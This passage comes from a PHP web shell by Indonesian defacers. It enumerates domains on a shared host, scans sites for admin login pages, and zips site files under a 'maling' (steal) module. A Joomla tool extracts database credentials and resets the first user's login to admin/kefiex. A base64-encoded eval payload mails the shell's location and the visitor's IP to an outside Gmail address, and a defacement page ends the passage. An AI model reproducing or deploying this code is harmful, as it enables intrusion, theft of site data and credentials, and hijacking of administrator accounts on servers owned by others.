2373. <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2374. }}}}
2375. echo "<center>Total Domains Found: ".$i."</center><br />";}
2376.  
2377. break;
2378. ###############################
2379. if(is_readable("/etc/named.conf")){
2380. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2381. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2382. $named = file_get_contents("/etc/named.conf");
2383. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
2384. foreach($domains[1] as $domain){
2385. $domain = trim($domain);
2386. $i += 1;
2387. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2388. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."'
2389. target='_blank'>DIR</a></center></td>";
2390. }
2391. echo "<center>Total Domains Found: ".$i."</center><br />";
2392.  
2393. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
2394.  
2395. break;
2396. ############################
2397. if(is_readable("/etc/valiases")){
2398. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2399. echo'<tr><td><center><b>SITE</b></center></td><td>
2400. <center><b>USER</b></center></td><td></center>
2401. <b>SYMLINK</b></center></td>';
2402. $list = scandir("/etc/valiases");
2403. foreach($list as $domain){
2404. $i += 1;
2405. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2406. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2407. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2408. <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2409. }
2410. echo "<center>Total Domains Found: ".$i."</center><br />";
2411. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
2412.  
2413. break;
2414. }
2415. ?>
2416. <?php
2417. if (isset($_GET['jak']) && ($_GET['jak'] == 'finder')) {
2418. ?>
2419. <form action="?&amp;jak=finder" method="post">
2420. <?php
2421. set_time_limit(0);
2422. error_reporting(0);
2423. $list['front'] =
2424. "
2425. admin
2426. adm
2427. admincp
2428. admcp
2429. cp
2430. modcp
2431. moderatorcp
2432. adminare
2433. admins
2434. cpanel
2435. controlpanel";
2436. $list['end'] = "
2437. admin1.php
2438. admin1.html
2439. admin2.php
2440. admin2.html
2441. yonetim.php
2442. yonetim.html
2443. yonetici.php
2444. yonetici.html
2445. ccms/
2446. ccms/login.php
2447. ccms/index.php
2448. maintenance/
2449. webmaster/
2450. adm/
2451. configuration/
2452. configure/
2453. websvn/
2454. admin/
2455. admin/account.php
2456. admin/account.html
2457. admin/index.php
2458. admin/index.html
2459. admin/login.php
2460. admin/login.html
2461. admin/home.php
2462. admin/controlpanel.html
2463. admin/controlpanel.php
2464. admin.php
2465. admin.html
2466. admin/cp.php
2467. admin/cp.html
2468. cp.php
2469. cp.html
2470. administrator/
2471. administrator/index.html
2472. administrator/index.php
2473. administrator/login.html
2474. administrator/login.php
2475. administrator/account.html
2476. administrator/account.php
2477. administrator.php
2478. administrator.html
2479. login.php
2480. login.html
2481. modelsearch/login.php
2482. moderator.php
2483. moderator.html
2484. moderator/login.php
2485. moderator/login.html
2486. moderator/admin.php
2487. moderator/admin.html
2488. moderator/
2489. account.php
2490. account.html
2491. controlpanel/
2492. controlpanel.php
2493. controlpanel.html
2494. admincontrol.php
2495. admincontrol.html
2496. adminpanel.php
2497. adminpanel.html
2498. admin1.asp
2499. admin2.asp
2500. yonetim.asp
2501. yonetici.asp
2502. admin/account.asp
2503. admin/index.asp
2504. admin/login.asp
2505. admin/home.asp
2506. admin/controlpanel.asp
2507. admin.asp
2508. admin/cp.asp
2509. cp.asp
2510. administrator/index.asp
2511. administrator/login.asp
2512. administrator/account.asp
2513. administrator.asp
2514. login.asp
2515. modelsearch/login.asp
2516. moderator.asp
2517. moderator/login.asp
2518. moderator/admin.asp
2519. account.asp
2520. controlpanel.asp
2521. admincontrol.asp
2522. adminpanel.asp
2523. fileadmin/
2524. fileadmin.php
2525. fileadmin.asp
2526. fileadmin.html
2527. administration/
2528. administration.php
2529. administration.html
2530. sysadmin.php
2531. sysadmin.html
2532. phpmyadmin/
2533. myadmin/
2534. sysadmin.asp
2535. sysadmin/
2536. ur-admin.asp
2537. ur-admin.php
2538. ur-admin.html
2539. ur-admin/
2540. Server.php
2541. Server.html
2542. Server.asp
2543. Server/
2544. wp-admin/
2545. administr8.php
2546. administr8.html
2547. administr8/
2548. administr8.asp
2549. webadmin/
2550. webadmin.php
2551. webadmin.asp
2552. webadmin.html
2553. administratie/
2554. admins/
2555. admins.php
2556. admins.asp
2557. admins.html
2558. administrivia/
2559. Database_Administration/
2560. WebAdmin/
2561. useradmin/
2562. sysadmins/
2563. admin1/
2564. system-administration/
2565. administrators/
2566. pgadmin/
2567. directadmin/
2568. staradmin/
2569. ServerAdministrator/
2570. SysAdmin/
2571. administer/
2572. LiveUser_Admin/
2573. sys-admin/
2574. typo3/
2575. panel/
2576. cpanel/
2577. cPanel/
2578. cpanel_file/
2579. platz_login/
2580. rcLogin/
2581. blogindex/
2582. formslogin/
2583. autologin/
2584. support_login/
2585. meta_login/
2586. manuallogin/
2587. simpleLogin/
2588. loginflat/
2589. utility_login/
2590. showlogin/
2591. memlogin/
2592. members/
2593. login-redirect/
2594. sub-login/
2595. wp-login/
2596. login1/
2597. dir-login/
2598. login_db/
2599. xlogin/
2600. smblogin/
2601. customer_login/
2602. UserLogin/
2603. login-us/
2604. acct_login/
2605. admin_area/
2606. bigadmin/
2607. project-admins/
2608. phppgadmin/
2609. pureadmin/
2610. sql-admin/
2611. radmind/
2612. openvpnadmin/
2613. wizmysqladmin/
2614. vadmind/
2615. ezsqliteadmin/
2616. hpwebjetadmin/
2617. newsadmin/
2618. adminpro/
2619. Lotus_Domino_Admin/
2620. bbadmin/
2621. vmailadmin/
2622. Indy_admin/
2623. ccp14admin/
2624. irc-macadmin/
2625. banneradmin/
2626. sshadmin/
2627. phpldapadmin/
2628. macadmin/
2629. administratoraccounts/
2630. admin4_account/
2631. admin4_colon/
2632. radmind-1/
2633. Super-Admin/
2634. AdminTools/
2635. cmsadmin/
2636. SysAdmin2/
2637. globes_admin/
2638. cadmins/
2639. phpSQLiteAdmin/
2640. navSiteAdmin/
2641. server_admin_small/
2642. logo_sysadmin/
2643. server/
2644. database_administration/
2645. power_user/
2646. system_administration/
2647. ss_vms_admin_sm/
2648. adminarea/
2649. bb-admin/
2650. adminLogin/
2651. panel-administracion/
2652. instadmin/
2653. memberadmin/
2654. administratorlogin/
2655. admin/admin.php
2656. admin_area/admin.php
2657. admin_area/login.php
2658. siteadmin/login.php
2659. siteadmin/index.php
2660. siteadmin/login.html
2661. admin/admin.html
2662. admin_area/index.php
2663. bb-admin/index.php
2664. bb-admin/login.php
2665. bb-admin/admin.php
2666. admin_area/login.html
2667. admin_area/index.html
2668. admincp/index.asp
2669. admincp/login.asp
2670. admincp/index.html
2671. webadmin/index.html
2672. webadmin/admin.html
2673. webadmin/login.html
2674. admin/admin_login.html
2675. admin_login.html
2676. panel-administracion/login.html
2677. nsw/admin/login.php
2678. webadmin/login.php
2679. admin/admin_login.php
2680. admin_login.php
2681. admin_area/admin.html
2682. pages/admin/admin-login.php
2683. admin/admin-login.php
2684. admin-login.php
2685. bb-admin/index.html
2686. bb-admin/login.html
2687. bb-admin/admin.html
2688. admin/home.html
2689. pages/admin/admin-login.html
2690. admin/admin-login.html
2691. admin-login.html
2692. admin/adminLogin.html
2693. adminLogin.html
2694. home.html
2695. rcjakar/admin/login.php
2696. adminarea/index.html
2697. adminarea/admin.html
2698. webadmin/index.php
2699. webadmin/admin.php
2700. user.html
2701. modelsearch/login.html
2702. adminarea/login.html
2703. panel-administracion/index.html
2704. panel-administracion/admin.html
2705. modelsearch/index.html
2706. modelsearch/admin.html
2707. admincontrol/login.html
2708. adm/index.html
2709. adm.html
2710. user.php
2711. panel-administracion/login.php
2712. wp-login.php
2713. adminLogin.php
2714. admin/adminLogin.php
2715. home.php
2716. adminarea/index.php
2717. adminarea/admin.php
2718. adminarea/login.php
2719. panel-administracion/index.php
2720. panel-administracion/admin.php
2721. modelsearch/index.php
2722. modelsearch/admin.php
2723. admincontrol/login.php
2724. adm/admloginuser.php
2725. admloginuser.php
2726. admin2/login.php
2727. admin2/index.php
2728. adm/index.php
2729. adm.php
2730. affiliate.php
2731. adm_auth.php
2732. memberadmin.php
2733. administratorlogin.php
2734. admin/admin.asp
2735. admin_area/admin.asp
2736. admin_area/login.asp
2737. admin_area/index.asp
2738. bb-admin/index.asp
2739. bb-admin/login.asp
2740. bb-admin/admin.asp
2741. pages/admin/admin-login.asp
2742. admin/admin-login.asp
2743. admin-login.asp
2744. user.asp
2745. webadmin/index.asp
2746. webadmin/admin.asp
2747. webadmin/login.asp
2748. admin/admin_login.asp
2749. admin_login.asp
2750. panel-administracion/login.asp
2751. adminLogin.asp
2752. admin/adminLogin.asp
2753. home.asp
2754. adminarea/index.asp
2755. adminarea/admin.asp
2756. adminarea/login.asp
2757. panel-administracion/index.asp
2758. panel-administracion/admin.asp
2759. modelsearch/index.asp
2760. modelsearch/admin.asp
2761. admincontrol/login.asp
2762. adm/admloginuser.asp
2763. admloginuser.asp
2764. admin2/login.asp
2765. admin2/index.asp
2766. adm/index.asp
2767. adm.asp
2768. affiliate.asp
2769. adm_auth.asp
2770. memberadmin.asp
2771. administratorlogin.asp
2772. siteadmin/login.asp
2773. siteadmin/index.asp
2774. ADMIN/
2775. paneldecontrol/
2776. login/
2777. cms/
2778. admon/
2779. ADMON/
2780. administrador/
2781. ADMIN/login.php
2782. panelc/
2783. ADMIN/login.html";
2784. function template() {
2785. echo '
2786.  
2787. <script type="text/javascript">
2788. <!--
2789. function insertcode($text, $place, $replace)
2790. {
2791.    var $this = $text;
2792.    var logbox = document.getElementById($place);
2793.    if($replace == 0)
2794.        document.getElementById($place).innerHTML = logbox.innerHTML+$this;
2795.    else
2796.        document.getElementById($place).innerHTML = $this;
2797. //document.getElementById("helpbox").innerHTML = $this;
2798. }
2799. -->
2800. </script>
2801. <br>
2802. <br>
2803. <h1 class="technique-two">
2804.      
2805.  
2806.  
2807. </h1>
2808.  
2809. <div class="wrapper">
2810. <div class="red">
2811. <div class="tube">
2812. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
2813. <form action="" method="post" name="xploit_form">
2814.  
2815. <tr>
2816. <tr>
2817.     <b><td>URL</td>
2818.     <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
2819.     </td>
2820. </tr><tr>
2821.     <td>404 string</td>
2822.     <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
2823.     </td></b>
2824. </tr><br><td>
2825. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
2826. </span></td></tr>
2827. </form></td></tr>
2828. <br /></table>
2829. </div> <!-- /tube -->
2830. </div> <!-- /red -->
2831. <br />
2832. <div class="green">
2833. <div class="tube" id="rightcol">
2834. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
2835. <b>Found ones:<br /></b>
2836. </div> <!-- /tube -->
2837. </div></center><!-- /green -->
2838. <br clear="all" /><br />
2839. <div class="blue">
2840. <div class="tube" id="logbox">
2841. <br />
2842. <br />
2843. Admin page Finder :<br /><br />
2844. </div> <!-- /tube -->
2845. </div> <!-- /blue -->
2846. </div> <!-- /wrapper -->
2847. <br clear="all"><br>';
2848. }
2849. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
2850.     if($br == 1) $msg .= "<br />";
2851.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
2852.     if($stop == 1) exit;
2853.     @flush();@ob_flush();
2854. }
2855. function check($x, $front=0) {
2856.     global $_POST,$site,$false;
2857.     if($front == 0) $t = $site.$x;
2858.     else $t = 'http://'.$x.'.'.$site.'/';
2859.     $headers = get_headers($t);
2860.     if (!eregi('200', $headers[0])) return 0;
2861.     $data = @file_get_contents($t);
2862.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
2863.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
2864.     return 1;
2865. }
2866.    
2867. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2868. template();
2869. if(!isset($_POST['xploit_url'])) die;
2870. if($_POST['xploit_url'] == '') die;
2871. $site = $_POST['xploit_url'];
2872. if ($site[strlen($site)-1] != "/") $site .= "/";
2873. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
2874. $list['end'] = str_replace("\r", "", $list['end']);
2875. $list['front'] = str_replace("\r", "", $list['front']);
2876. $pathes = explode("\n", $list['end']);
2877. $frontpathes = explode("\n", $list['front']);
2878. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
2879. $verificate = 0;
2880. foreach($pathes as $path) {
2881.     show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
2882.     $verificate++; show($verificate, 0, 0, 'verified', 1);
2883.     if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
2884.     else{
2885.         show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
2886.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
2887.     }
2888. }
2889. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
2890. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
2891. foreach($frontpathes as $frontpath) {
2892.     show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
2893.     $verificate++; show($verificate, 0, 0, 'verified', 1);
2894.     if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
2895.     else{
2896.         show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
2897.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
2898.     }
2899.    
2900. }
2901. }
2902. ?>
2903. <?php
2904. if(isset($_GET['x']) && ($_GET['x'] == 'maling')){ ?>
2905. <form action="?y=<?php echo $pwd; ?>&amp;x=maling" method="post">
2906. <form method="post" action="" enctype="multipart/form-data">
2907. <input type=text name=sites size=40></nobr><br>
2908. <input type="submit" name="go" value="Colong!" style="margin: 5px auto; hight: 25px; width: 100px;">
2909. </form>
2910. <?php
2911. $site = explode("\r\n", $_POST['sites']);
2912. $go = $_POST['go'];
2913. if($go) {
2914. foreach($site as $sites) {
2915. @session_start();
2916. @error_reporting(0);
2917. @ini_set('error_log',NULL);
2918. @ini_set('log_errors',0);
2919. @ini_set('max_execution_time',0);
2920. @ini_set('display_errors', 0);
2921. @set_time_limit(0);
2922. $folder="$sites";
2923. $output="hasil-maling.zip";
2924. $zip = new ZipArchive();
2925.  
2926. if ($zip->open($output, ZIPARCHIVE::CREATE) !== TRUE) {
2927.     die ("Unable to open Archirve");
2928. }
2929.  
2930. $all= new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
2931.  
2932. foreach ($all as $f=>$value) {
2933.     $zip->addFile(realpath($f), $f) or die ("ERROR: Unable to add file: $f");
2934. }
2935. $zip->close();
2936. echo "Selamat Anda Berhasil Mencuri Data Website ";
2937. }
2938. }
2939. }
2940. ?>
2941. <?php
2942. $n0b="QGluaV9zZXQoJ291dHB1dF9idWZmZXJpbmcnLCAwKTsNCkBpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIDApOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnNjRNJyk7DQpoZWFkZXIoJ0NvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04Jyk7DQokbjBiPSAneWFtYWFwOTJAZ21haWwuY29tJzsNCiR4X3BhdGggPSAiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KJHBlc2FuX2FsZXJ0ID0gImZpeCAkeF9wYXRoIDpwICpJUCBBZGRyZXNzIDogWyAiIC4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gLiAiIF0iOw0KbWFpbCgkbjBiLCAiTWFobyIsICRwZXNhbl9hbGVydCwgIlsgIiAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gIiBdIik7";
2943. eval(base64_decode($n0b));
2944. ?>
2945. <?php
2946. if(isset($_GET['x']) && ($_GET['x'] == 'about'))
2947.     {
2948.     ?>
2949.     <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
2950. <html lang="en">
2951. <head>
2952. <meta charset="utf-8" />
2953. <TITLE>whoami?</TITLE>
2954. <META NAME="description" CONTENT="AsuKabeh"/>
2955. <META NAME="keywords" CONTENT="shamp0erna99"/>
2956. <META NAME="copyright" CONTENT="Copyright . All Rights Reserved."/>
2957. <META NAME="author" CONTENT="shmprn99"/>
2958. <meta NAME="robots" CONTENT="index,follow"/>
2959. <META NAME="language" CONTENT="En">
2960. <META NAME="revisit-after" CONTENT="1"/>
2961. <link href='http://fonts.googleapis.com/css?family=Averia+Sans+Libre' rel='stylesheet' type='text/css'/>
2962. </head>
2963. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
2964. <body>
2965. <style type="text/css">
2966.   body {
2967.     background-color: black;
2968.   }
2969.   .sok {
2970.     margin-top: 20%;
2971.   }
2972. </style>
2973. <div class="sok"><b><font size="20" face="Iceland"><center><SCRIPT>
2974. farbbibliothek = new Array();
2975. farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
2976. farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
2977. farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
2978. farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
2979. farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
2980. farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
2981. farbbibliothek[6] = new Array("#0000FF","#FFFF00");
2982. farben = farbbibliothek[4];
2983. function farbschrift()
2984. {
2985. for(var i=0 ; i<Buchstabe.length; i++)
2986. {
2987. document.all["a"+i].style.color=farben[i];
2988. }
2989. farbverlauf();
2990. }
2991. function string2array(text)
2992. {
2993. Buchstabe = new Array();
2994. while(farben.length<text.length)
2995. {
2996. farben = farben.concat(farben);
2997. }
2998. k=0;
2999. while(k<=text.length)
3000. {
3001. Buchstabe[k] = text.charAt(k);
3002. k++;
3003. }
3004. }
3005. function divserzeugen()
3006. {
3007. for(var i=0 ; i<Buchstabe.length; i++)
3008. {
3009. document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
3010. }
3011. farbschrift();
3012. }
3013. var a=1;
3014. function farbverlauf()
3015. {
3016. for(var i=0 ; i<farben.length; i++)
3017. {
3018. farben[i-1]=farben[i];
3019. }
3020. farben[farben.length-1]=farben[-1];
3021.  
3022. setTimeout("farbschrift()",20);
3023. }
3024. //
3025. var farbsatz=1;
3026. function farbtauscher()
3027. {
3028. farben = farbbibliothek[farbsatz];
3029. while(farben.length<text.length)
3030. {
3031. farben = farben.concat(farben);
3032. }
3033. farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
3034. }
3035. setInterval("farbtauscher()",2000);
3036. text= "Pwndzx by shamp0erna99"; //h
3037. string2array(text);
3038. divserzeugen();
3039. //document.write(text);
3040. </SCRIPT></center></font></b></div>
3041. <center>
3042. <br><font color="red">Not only are black people protected and supported but all</font><font color="white"> religious people throughout the world are obliged to protect one another. Do you understand that?
3043. <br><font color="red">#Indonesian</font><font color="white"> Hacker Rulez @2020</font><br>
3044. ============================<br>JakselWorld<a href="https://local-hunter.com/">.</a></center>
3045. <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/19171558&auto_play=true"></iframe>
3046. <script type='text/javascript'>
3047. //<![CDATA[
3048. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://translate.google.co.id/?hl=id#view=home&op=translate&sl=auto&tl=id&text=MAU%20NGAPAIN%20COK%20%3F"});
3049. //]]>
3050. </script>
3051. </body>
3052. </html>
3053.  
3054. <?php
3055. }
3056. //////////////////////////////////////////////////////////////////////////////
3057.  
3058. ?>
3059.  
3060. <?php
3061. if (isset($_GET['jak']) && ($_GET['jak'] == 'jomla')) {
3062. ?>
3063. <form action="?&amp;jak=jomla" method="post">
3064. <?php  
3065. error_reporting(0);
3066.     if($_POST){
3067.  
3068.         function jipukteks($param, $kata1, $kata2){
3069.     if(strpos($param, $kata1) === FALSE) return FALSE;
3070.     if(strpos($param, $kata2) === FALSE) return FALSE;
3071.     $start = strpos($param, $kata1) + strlen($kata1);
3072.     $end = strpos($param, $kata2, $start);
3073.     $return = substr($param, $start, $end - $start);
3074.     return $return;
3075. }
3076.  
3077.     function anucurl($sites){
3078.         $ch1 = curl_init ("$sites");
3079. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
3080. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
3081. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3082. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
3083. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
3084. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
3085. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
3086. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
3087. $data = curl_exec ($ch1);
3088. return $data;
3089.     }
3090.  
3091. function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
3092.     $post2 = array(
3093.                     "username" => "$fak1",
3094.                     "passwd" => "$fak2",
3095.                     "lang" => "en-GB",
3096.                     "option" => "com_login",
3097.                     "task" => "login",
3098.                     "return" => "$fak3",
3099.                     "$fak4" => "1",
3100.                    
3101.                     );
3102. $ch = curl_init ("$cek");
3103. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
3104. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
3105. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3106. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
3107. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
3108. curl_setopt ($ch, CURLOPT_POST, 1);
3109. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
3110. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
3111. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
3112. $data6 = curl_exec ($ch);
3113. return $data6;
3114.     }
3115.  
3116.         $link = $_POST['link'];
3117.         if($link==""){
3118.             echo "Report: <br>";
3119.             echo "-> Link Config anda belum terisi <-";
3120.         }
3121.         else{
3122.  
3123.         $file = anucurl($link);
3124.  
3125.                     $host = jipukteks($file,"smtphost = '","'");
3126.                     $username = jipukteks($file,"user = '","'");
3127.                     $password = jipukteks($file,"password = '","'");
3128.                     $db = jipukteks($file,"db = '","'");
3129.                     $dbprefix = jipukteks($file,"dbprefix = '","'");
3130.                     $user_baru = "admin";
3131.                     $password_baru = "kefiex";
3132.                     $prefix = $dbprefix."users";
3133.                     $pass = md5("$password_baru");
3134.                     $serah = $db.".".$dbprefix;
3135.                    
3136.  
3137.                     echo "<font color='#C6C646'>Database Content :</font><br>";
3138.                     echo "Db Host&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$host</font><br>";
3139.                     echo "Db user&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$username</font><br>";
3140.                     echo "Db Password &nbsp: <font color='green'>$password</font><br>";
3141.                     echo "Db name&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp: <font color='green'>$db</font><br>";
3142.                     echo "Table_Prefix &nbsp&nbsp: <font color='green'>$dbprefix</font><br>";        
3143.  
3144.         mysql_connect($host,$username,$password) or die("<br><font color='red'>Gagal Terkoneksi Ke Database ...</font>");
3145.         mysql_select_db($db) or die("<font color='red'>Database tidak bisa dibuka ...</font>");
3146.  
3147.         $show=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3148.     $r=mysql_fetch_array($show);
3149.         $id = $r[id];
3150.        
3151.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
3152. $utama = "$link";
3153. $kedua = @file_get_contents($utama);
3154. if(preg_match("askdasldasdlja12123",$kedua)){
3155.                         echo "# <font color='green'>berhasil rubah password</font><br>";
3156.                         echo "# $utama<br>";
3157.                        
3158.                     }
3159.                     else{
3160.                         echo "<br># <font color='green'>Pasword berhasil dirubah: </font><br>";
3161.                         echo "Username: <font color='#C6C646'>$user_baru</font><br>";
3162.                         echo "Password: <font color='#C6C646'>$password_baru</font><br>";
3163.  
3164.                        
3165.                     }
3166.                 }
3167.  
3168.  
3169.  
3170.  
3171.     }else{
3172.             echo '<html>
3173.            <body>
3174.            <center>
3175.                <center><br><span style="font-size:1.6em;"> .: Joomla Password Reset | Tools :. </span><br>Coded by Bl4ckcod37</center><br>
